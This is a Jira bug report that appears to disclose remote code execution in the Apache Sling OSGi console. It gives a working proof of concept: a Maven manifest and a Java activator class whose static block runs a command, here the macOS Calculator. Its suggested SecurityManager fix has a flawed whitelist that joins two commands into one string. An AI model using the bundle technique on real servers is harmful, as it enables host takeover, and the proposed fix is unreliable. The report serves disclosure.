[jira] [Created] (SLING-11658) sling remote code execute

Tue, 01 Nov 2022 19:58:08 -0700 

QSec-Team created SLING-11658:
---------------------------------

             Summary: sling remote code execute
                 Key: SLING-11658
                 URL: https://issues.apache.org/jira/browse/SLING-11658
             Project: Sling
          Issue Type: Bug
          Components: Console
    Affects Versions: App CMS 1.1.2
         Environment: OpenJDK Runtime Environment (Zulu 
8.64.0.19-CA-macos-aarch64) (build 1.8.0_345-b01)
            Reporter: QSec-Team
         Attachments: 1.png, 2.png

h1. Utilization process

 
After Sling logs in,Osgi management function,You can obtain host control by 
uploading the bundle component package.

!1.png!

 
After uploading the malicious bundle package constructed by the attacker,First 
click the "Refresh Package Imports" button, and then click the "start" 
button,This will trigger the bundle group price loading, and the malicious code 
will be executed.

!2.png!

 
h1. Jar package construction:

 
Create a new Maven project and add the following compilation options in pom.xml:
{code:java}
   <build>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-assembly-plugin</artifactId>
                <configuration>
                    <descriptorRefs>
                        <descriptorRef>jar-with-dependencies</descriptorRef>
                    </descriptorRefs>
                    <archive>
                        <manifestEntries>
                            <Bundle-SymbolicName>shxjia</Bundle-SymbolicName>
                            <Bundle-Activator>jsx.ink.Main</Bundle-Activator>
                            <Bundle-Version>6.6.6</Bundle-Version>
                        </manifestEntries>
                    </archive>
                </configuration>
            </plugin>
        </plugins>
    </build> {code}
Create Main.java in the source code folder:

Note the "package jsx. ink;" in the source code It should correspond to the 
Bundle Activator attribute in pom.xml.
{code:java}
package jsx.ink;
public class Main {
    static {
        try {
            
Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (Exception e) {
        }
    }
    public static void main(String[] args) {        System.out.println("Hello 
world!");
    }
} {code}
After the code is written, enter the directory where pom.xml is located and use 
the maven command to package:
{code:java}
mvn assembly:assembly -f pom.xml {code}
h1.  
h1. Repair
 

You can use securityManager to restrict some operations.
{code:java}
 SecurityManager securityManager = new SecurityManager() {
            @Override
            public void checkExec(String cmd) {
                List<String> whiteList = Arrays.asList("whoami,netstat");       
         if (!whiteList.contains(cmd)) {
                    throw new RuntimeException("command execute denied!");
                }
                super.checkExec(cmd);
            }
        };
        System.setSecurityManager(securityManager); {code}



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

Reply via email to